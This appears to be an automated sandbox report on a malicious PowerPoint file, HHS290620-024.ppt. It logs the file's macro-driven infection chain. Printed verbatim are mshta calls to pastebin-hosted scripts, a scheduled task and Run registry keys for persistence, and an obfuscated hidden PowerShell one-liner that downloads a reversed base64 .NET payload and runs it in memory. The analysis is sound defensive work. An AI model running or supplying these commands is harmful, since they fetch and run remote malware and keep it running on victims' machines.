            Source: mshta.exe, 00000005.00000003.894187184.00423000.00000004.00000001.sdmpString found in binary or memory: https://pastebin.com/raw/9nU58ujwC:
            Source: mshta.exe, 00000005.00000003.894126013.00401000.00000004.00000001.sdmpString found in binary or memory: https://pastebin.com/raw/9nU58ujwSD
            Source: mshta.exe, 00000005.00000002.895420828.003EA000.00000004.00000020.sdmpString found in binary or memory: https://pastebin.com/raw/9nU58ujwdgha
            Source: mshta.exe, 00000005.00000003.893285456.01ED2000.00000004.00000001.sdmpString found in binary or memory: https://pastebin.com/raw/9nU58ujwhttps://pastebin.com/raw/9nU58ujw
            Source: mshta.exe, 00000005.00000003.894126013.00401000.00000004.00000001.sdmpString found in binary or memory: https://pastebin.com/raw/9nU58ujwl/
            Source: mshta.exe, 00000005.00000002.895336624.00373000.00000004.00000020.sdmpString found in binary or memory: https://pastebin.com/raw/9nU58ujwm52LAJ
            Source: mshta.exe, 00000005.00000003.894126013.00401000.00000004.00000001.sdmpString found in binary or memory: https://report-uri.cloudflare.com/cdn-cgi/beacon/expect-ct
            Source: mshta.exe, 00000005.00000003.894187184.00423000.00000004.00000001.sdmpString found in binary or memory: https://secure.comodo.com/CPS0
            Source: mshta.exe, 00000005.00000003.894126013.00401000.00000004.00000001.sdmpString found in binary or memory: https://www.digicert.com/CPS0
            Source: unknownNetwork traffic detected: HTTP traffic on port 49159 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49161 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49159
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49169
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49168
            Source: unknownNetwork traffic detected: HTTP traffic on port 49162 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49167
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49166
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49162
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49161
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49171
            Source: unknownNetwork traffic detected: HTTP traffic on port 49168 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49169 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49167 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49171 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49166 -> 443

            Source: C:\Windows\System32\mshta.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
            Source: C:\Windows\System32\mshta.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
            Source: C:\Windows\System32\mshta.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
            Source: C:\Windows\System32\mshta.exeWindow created: window name: CLIPBRDWNDCLASS
            Source: C:\Windows\System32\mshta.exeWindow created: window name: CLIPBRDWNDCLASS
            Source: C:\Windows\System32\mshta.exeWindow created: window name: CLIPBRDWNDCLASS

            System Summary:

            barindex
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exeCode function: 21_2_0038B362 NtQuerySystemInformation,21_2_0038B362
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exeCode function: 21_2_0038B331 NtQuerySystemInformation,21_2_0038B331
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exeCode function: 21_2_00EDEBC821_2_00EDEBC8
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exeCode function: 21_2_00EDD24021_2_00EDD240
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exeCode function: 21_2_00EDDA5821_2_00EDDA58
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exeCode function: 21_2_00ED001621_2_00ED0016
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exeCode function: 21_2_00EDDDC321_2_00EDDDC3
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exeCode function: 21_2_00EDF2D021_2_00EDF2D0
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exeCode function: 21_2_00EDF2BF21_2_00EDF2BF
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exeCode function: 21_2_00EDEBB821_2_00EDEBB8
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exeCode function: 21_2_00EDDE3021_2_00EDDE30
            Source: HHS290620-024.pptOLE, VBA macro line: Sub Auto_Close()
            Source: VBA code instrumentationOLE, VBA macro: Module Module1, Function Auto_CloseName: Auto_Close
            Source: HHS290620-024.pptOLE indicator, VBA macros: true
            Source: HHS290620-024.pptOLE stream indicators for Word, Excel, PowerPoint, and Visio: all false
            Source: C:\Windows\System32\mshta.exeKey opened: HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\App Paths\OUTLOOK.EXEJump to behavior
            Source: C:\Windows\System32\mshta.exeKey opened: HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\App Paths\OUTLOOK.EXEJump to behavior
            Source: C:\Windows\System32\mshta.exeKey opened: HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\App Paths\OUTLOOK.EXEJump to behavior
            Source: C:\Windows\System32\mshta.exeKey opened: HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\App Paths\OUTLOOK.EXE
            Source: C:\Windows\System32\mshta.exeKey opened: HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\App Paths\OUTLOOK.EXE
            Source: C:\Windows\System32\mshta.exeKey opened: HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\App Paths\OUTLOOK.EXE
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dll
            Source: classification engineClassification label: mal100.troj.expl.evad.winPPT@24/16@13/3
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exeCode function: 21_2_0038B1E6 AdjustTokenPrivileges,21_2_0038B1E6
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exeCode function: 21_2_0038B1AF AdjustTokenPrivileges,21_2_0038B1AF
            Source: C:\Program Files\Microsoft Office\Office14\POWERPNT.EXEFile created: C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\HHS290620-024.LNKJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMutant created: \Sessions\1\BaseNamedObjects\Global\.net clr networking
            Source: C:\Program Files\Microsoft Office\Office14\POWERPNT.EXEFile created: C:\Users\user\AppData\Local\Temp\CVRD4C0.tmpJump to behavior
            Source: C:\Windows\System32\schtasks.exeConsole Write: ...........u..0.........,...|...............................`.3...S...U...U.......#...3...........#..........,@...#.G.\uJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: .........3]i....#........3]i......3.L|\iT.....Sl 'bi..Sl....L|\i.............7]i@.....\i..3...G............. 'bi..\i....
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........D.......#.....G........uD..................u..0.........`...D.......................#.......$.......>..u........
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................/.....G........u...................u..0.........`...D......................./...............>..u........
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........D......./.....G........uD..................u..0.........`...D......................./.......$.......>..u........
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................;.....G........u...................u..0.........`...D...;...................;...............>..u........
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........D.......;.....G........uD..................u..0.........`...D...V...................;.......$.......>..u........
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................G...A.t. .l.i.n.e.:.1. .c.h.a.r.:.4.2.3.........`...D...~...................G...........$...>..u........
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........D.......G.....G........uD..................u..0.........`...D.......................G.......$.......>..u........
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................S.....G........u...................u..0.........`...D.......................S...............>..u........
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........D.......S.....G........uD..................u..0.........`...D.......................S.......$.......>..u........
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................_.....G........u...................u..0.........`...D......................._...............>..u........
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........D......._.....G........uD..................u..0.........`...D......................._.......$.......>..u........
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................k.....G........u...................u..0.........`...D...V...................k...............>..u........
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........D.......k.....G........uD..................u..0.........`...D.......................k.......$.......>..u........
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................w.....G........u...................u..0.........`...........................w...............>..u........
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........D.......w.....G........uD..................u..0.........`...........................w.......$.......>..u........
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ......................G........u...................u..0.........`...........................................>..u........
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........D.............G........uD..................u..0.........`...................................$.......>..u........
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ......................G........u...................u..0.........`.......?...............................T...>..u........
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........D.............G........uD..................u..0.........`.......Z...........................$.......>..u........
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ......................G........u...................u..0.........`...........................................>..u........
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........D.............G........uD..................u..0.........`...................................$.......>..u........
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ......................G........u...................u..0.........`.......................................t...>..u........
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........D.............G........uD..................u..0.........`...D...............................$.......>..u........
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: .................... .G........u...................u..0.........`...D..."...................................>..u........
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........D.............G........uD..................u..0.........`...D...=...........................$.......>..u........
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: C:\Windows\assembly\NativeImages_v2.0.50727_32\mscorlib\9f895c66454577eff9c77442d0c84f71\mscorlib.ni.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: C:\Windows\assembly\GAC_32\mscorlib\2.0.0.0__b77a5c561934e089\sorttbls.nlpJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: C:\Windows\assembly\GAC_32\mscorlib\2.0.0.0__b77a5c561934e089\sortkey.nlpJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: C:\Windows\assembly\NativeImages_v2.0.50727_32\mscorlib\9f895c66454577eff9c77442d0c84f71\mscorlib.ni.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: C:\Windows\assembly\GAC_32\mscorlib\2.0.0.0__b77a5c561934e089\sorttbls.nlpJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: C:\Windows\assembly\GAC_32\mscorlib\2.0.0.0__b77a5c561934e089\sortkey.nlpJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exeSection loaded: C:\Windows\assembly\NativeImages_v2.0.50727_32\mscorlib\9f895c66454577eff9c77442d0c84f71\mscorlib.ni.dll
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exeSection loaded: C:\Windows\assembly\GAC_32\mscorlib\2.0.0.0__b77a5c561934e089\sorttbls.nlp
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exeSection loaded: C:\Windows\assembly\GAC_32\mscorlib\2.0.0.0__b77a5c561934e089\sortkey.nlp
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: C:\Windows\assembly\NativeImages_v2.0.50727_32\mscorlib\9f895c66454577eff9c77442d0c84f71\mscorlib.ni.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: C:\Windows\assembly\GAC_32\mscorlib\2.0.0.0__b77a5c561934e089\sorttbls.nlp
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: C:\Windows\assembly\GAC_32\mscorlib\2.0.0.0__b77a5c561934e089\sortkey.nlp
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: C:\Windows\assembly\NativeImages_v2.0.50727_32\mscorlib\9f895c66454577eff9c77442d0c84f71\mscorlib.ni.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: C:\Windows\assembly\GAC_32\mscorlib\2.0.0.0__b77a5c561934e089\sorttbls.nlp
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: C:\Windows\assembly\GAC_32\mscorlib\2.0.0.0__b77a5c561934e089\sortkey.nlp
            Source: C:\Windows\System32\mshta.exeWMI Queries: IWbemServices::ExecMethod - Win32_Process::Create
            Source: C:\Windows\System32\mshta.exeWMI Queries: IWbemServices::ExecMethod - Win32_Process::Create
            Source: C:\Windows\System32\mshta.exeWMI Queries: IWbemServices::ExecMethod - Win32_Process::Create
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exeWMI Queries: IWbemServices::CreateInstanceEnum - Win32_Processor
            Source: C:\Program Files\Microsoft Office\Office14\POWERPNT.EXEFile read: C:\Users\desktop.iniJump to behavior
            Source: C:\Windows\System32\mshta.exeKey opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
            Source: C:\Windows\System32\mshta.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
            Source: C:\Windows\System32\mshta.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
            Source: C:\Windows\System32\mshta.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
            Source: C:\Windows\System32\mshta.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
            Source: C:\Windows\System32\mshta.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
            Source: C:\Windows\System32\mshta.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
            Source: C:\Windows\System32\mshta.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
            Source: C:\Windows\System32\mshta.exeFile read: C:\Windows\System32\drivers\etc\hosts
            Source: C:\Windows\System32\mshta.exeFile read: C:\Windows\System32\drivers\etc\hosts
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile read: C:\Windows\System32\drivers\etc\hosts
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile read: C:\Windows\System32\drivers\etc\hosts
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile read: C:\Windows\System32\drivers\etc\hosts
            Source: C:\Windows\System32\mshta.exeFile read: C:\Windows\System32\drivers\etc\hosts
            Source: C:\Windows\System32\mshta.exeFile read: C:\Windows\System32\drivers\etc\hosts
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile read: C:\Windows\System32\drivers\etc\hosts
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile read: C:\Windows\System32\drivers\etc\hosts
            Source: HHS290620-024.pptVirustotal: Detection: 14%
            Source: unknownProcess created: C:\Program Files\Microsoft Office\Office14\POWERPNT.EXE 'C:\Program Files\Microsoft Office\Office14\POWERPNT.EXE' /AUTOMATION -Embedding
            Source: unknownProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c 'C:\Users\user\Desktop\HHS290620-024.ppt'
            Source: unknownProcess created: C:\Program Files\Microsoft Office\Office14\POWERPNT.EXE 'C:\Program Files\Microsoft Office\Office14\POWERPNT.EXE' 'C:\Users\user\Desktop\HHS290620-024.ppt'
            Source: unknownProcess created: C:\Windows\System32\mshta.exe mshta http://%40%40%40@j.mp/sdhgas6asdasdgha
            Source: unknownProcess created: C:\Windows\System32\schtasks.exe 'C:\Windows\System32\schtasks.exe' /create /sc MINUTE /mo 80 /tn 'win2 update' /tr '\''mshta\'http:\\pastebin.com\raw\DBMBYsw4' /F
            Source: unknownProcess created: C:\Windows\System32\mshta.exe 'C:\Windows\System32\mshta.exe' 'http:\\pastebin.com\raw\DBMBYsw4'
            Source: unknownProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell ((gp HKCU:\Software).iamresearcher)|IEX
            Source: unknownProcess created: C:\Windows\System32\taskeng.exe taskeng.exe {CE29C75C-2582-4048-996B-635B65BF5C70} S-1-5-21-290172400-2828352916-2832973385-1004:computer\user:Interactive:[1]
            Source: unknownProcess created: C:\Windows\System32\mshta.exe 'C:\Windows\system32\mshta.exe' 'http:\\pastebin.com\raw\9Lm52LAJ'
            Source: unknownProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -nologo -WindowStyle Hidden $_Xpin = ((New-Object Net.WebClient).DowNloAdSTRiNg('h'+'t'+'t'+'p'+'s'+':'+'/'+'/'+'p'+'a'+'s'+'t'+'e'+'b'+'i'+'n'+'.'+'c'+'o'+'m'+'/'+'r'+'a'+'w'+'/L7UDNEGk'));$_Xpin=$_Xpin.replace('.','*!(@*#(!@#*').replace('*!(@*#(!@#*','0');$_Xpin = $_Xpin.ToCharArray();[Array]::Reverse($_Xpin);[byte[]]$_PMP = [System.Convert]::FromBase64String($_Xpin);$_1 = [System.Threading.Thread]::GetDomain().Load($_PMP);$_1.EntryPoint.invoke($S,$X)
            Source: unknownProcess created: C:\Windows\System32\mshta.exe 'C:\Windows\system32\mshta.exe' 'http:\\pastebin.com\raw\fAFqQYgZ'
            Source: unknownProcess created: C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exe {path}
            Source: unknownProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell ((gp HKCU:\Software).iamresearcher)|IEX
            Source: unknownProcess created: C:\Windows\System32\mshta.exe 'C:\Windows\system32\mshta.exe' 'http:\\pastebin.com\raw\z0h2yS0U'
            Source: unknownProcess created: C:\Windows\System32\mshta.exe 'C:\Windows\system32\mshta.exe' vbscript:Execute('CreateObject(''Wscript.Shell'').Run ''powershell ((gp HKCU:\Software).iamresearcher)|IEX'', 0 : window.close')
            Source: unknownProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' ((gp HKCU:\Software).iamresearcher)|IEX
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Program Files\Microsoft Office\Office14\POWERPNT.EXE 'C:\Program Files\Microsoft Office\Office14\POWERPNT.EXE' 'C:\Users\user\Desktop\HHS290620-024.ppt'Jump to behavior
            Source: C:\Program Files\Microsoft Office\Office14\POWERPNT.EXEProcess created: C:\Windows\System32\mshta.exe mshta http://%40%40%40@j.mp/sdhgas6asdasdghaJump to behavior
            Source: C:\Windows\System32\mshta.exeProcess created: C:\Windows\System32\schtasks.exe 'C:\Windows\System32\schtasks.exe' /create /sc MINUTE /mo 80 /tn 'win2 update' /tr '\''mshta\'http:\\pastebin.com\raw\DBMBYsw4' /F Jump to behavior
            Source: C:\Windows\System32\mshta.exeProcess created: C:\Windows\System32\mshta.exe 'C:\Windows\System32\mshta.exe' 'http:\\pastebin.com\raw\DBMBYsw4'Jump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exe {path}Jump to behavior
            Source: C:\Windows\System32\mshta.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' ((gp HKCU:\Software).iamresearcher)|IEX
            Source: C:\Windows\System32\mshta.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{25336920-03F9-11CF-8FD0-00AA00686F13}\InProcServer32Jump to behavior
            Source: C:\Windows\System32\mshta.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\SettingsJump to behavior
            Source: Window RecorderWindow detected: More than 3 window changes detected
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework\v2.0.50727\mscorrc.dllJump to behavior
            Source: C:\Program Files\Microsoft Office\Office14\POWERPNT.EXEKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\PowerPoint\Resiliency\StartupItemsJump to behavior
            Source: C:\Program Files\Microsoft Office\Office14\POWERPNT.EXEFile opened: C:\Windows\WinSxS\x86_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_50916076bcb9a742\MSVCR90.dllJump to behavior
            Source: Binary string: mscorrc.pdb source: MSBuild.exe, 00000015.00000002.1232929880.04480000.00000002.00000001.sdmp
            Source: HHS290620-024.pptInitial sample: OLE summary keywords = curepresentation
            Source: HHS290620-024.pptInitial sample: OLE document summary bytes = 0
            Source: HHS290620-024.pptInitial sample: OLE document summary hiddenslides = 0
            Source: HHS290620-024.pptInitial sample: OLE document summary mmclips = 0
            Source: HHS290620-024.pptInitial sample: OLE document summary notes = 0
            Source: HHS290620-024.pptInitial sample: OLE document summary presentationtarget = Widescreen
            Source: HHS290620-024.pptInitial sample: OLE document summary slides = 0

            Data Obfuscation:

            barindex
            Obfuscated command line foundShow sources
            Source: unknownProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -nologo -WindowStyle Hidden $_Xpin = ((New-Object Net.WebClient).DowNloAdSTRiNg('h'+'t'+'t'+'p'+'s'+':'+'/'+'/'+'p'+'a'+'s'+'t'+'e'+'b'+'i'+'n'+'.'+'c'+'o'+'m'+'/'+'r'+'a'+'w'+'/L7UDNEGk'));$_Xpin=$_Xpin.replace('.','*!(@*#(!@#*').replace('*!(@*#(!@#*','0');$_Xpin = $_Xpin.ToCharArray();[Array]::Reverse($_Xpin);[byte[]]$_PMP = [System.Convert]::FromBase64String($_Xpin);$_1 = [System.Threading.Thread]::GetDomain().Load($_PMP);$_1.EntryPoint.invoke($S,$X)
            Suspicious powershell command line foundShow sources
            Source: unknownProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -nologo -WindowStyle Hidden $_Xpin = ((New-Object Net.WebClient).DowNloAdSTRiNg('h'+'t'+'t'+'p'+'s'+':'+'/'+'/'+'p'+'a'+'s'+'t'+'e'+'b'+'i'+'n'+'.'+'c'+'o'+'m'+'/'+'r'+'a'+'w'+'/L7UDNEGk'));$_Xpin=$_Xpin.replace('.','*!(@*#(!@#*').replace('*!(@*#(!@#*','0');$_Xpin = $_Xpin.ToCharArray();[Array]::Reverse($_Xpin);[byte[]]$_PMP = [System.Convert]::FromBase64String($_Xpin);$_1 = [System.Threading.Thread]::GetDomain().Load($_PMP);$_1.EntryPoint.invoke($S,$X)

            Persistence and Installation Behavior:

            barindex
            Creates processes via WMIShow sources
            Source: C:\Windows\System32\mshta.exeWMI Queries: IWbemServices::ExecMethod - Win32_Process::Create
            Source: C:\Windows\System32\mshta.exeWMI Queries: IWbemServices::ExecMethod - Win32_Process::Create
            Source: C:\Windows\System32\mshta.exeWMI Queries: IWbemServices::ExecMethod - Win32_Process::Create

            Boot Survival:

            barindex
            Creates autostart registry keys with suspicious values (likely registry only malware)Show sources
            Source: C:\Windows\System32\mshta.exeRegistry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run bin mshta vbscript:Execute("CreateObject(""Wscript.Shell"").Run ""powershell ((gp HKCU:\Software).iamresearcher)|IEX"", 0 : window.close")Jump to behavior
            Creates multiple autostart registry keysShow sources
            Source: C:\Windows\System32\mshta.exeRegistry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunOnce NULLJump to behavior
            Source: C:\Windows\System32\mshta.exeRegistry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run binJump to behavior
            Source: C:\Windows\System32\mshta.exeRegistry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run BACKup2Jump to behavior
            Source: C:\Windows\System32\mshta.exeRegistry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run BACKup3Jump to behavior
            Uses schtasks.exe or at.exe to add and modify task schedulesShow sources
            Source: unknownProcess created: C:\Windows\System32\schtasks.exe 'C:\Windows\System32\schtasks.exe' /create /sc MINUTE /mo 80 /tn 'win2 update' /tr '\''mshta\'http:\\pastebin.com\raw\DBMBYsw4' /F
            Source: C:\Windows\System32\mshta.exeRegistry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run BACKup2Jump to behavior
            Source: C:\Windows\System32\mshta.exeRegistry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run BACKup2Jump to behavior
            Source: C:\Windows\System32\mshta.exeRegistry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run BACKup3Jump to behavior
            Source: C:\Windows\System32\mshta.exeRegistry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run BACKup3Jump to behavior
            Source: C:\Windows\System32\mshta.exeRegistry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunOnce NULLJump to behavior
            Source: C:\Windows\System32\mshta.exeRegistry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunOnce NULLJump to behavior
            Source: C:\Windows\System32\mshta.exeRegistry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunOnce NULLJump to behavior
            Source: C:\Windows\System32\mshta.exeRegistry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunOnce NULLJump to behavior
            Source: C:\Windows\System32\mshta.exeRegistry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run binJump to behavior
            Source: C:\Windows\System32\mshta.exeRegistry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run binJump to behavior

            Source: C:\Program Files\Microsoft Office\Office14\POWERPNT.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files\Microsoft Office\Office14\POWERPNT.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files\Microsoft Office\Office14\POWERPNT.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files\Microsoft Office\Office14\POWERPNT.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files\Microsoft Office\Office14\POWERPNT.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files\Microsoft Office\Office14\POWERPNT.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files\Microsoft Office\Office14\POWERPNT.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files\Microsoft Office\Office14\POWERPNT.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
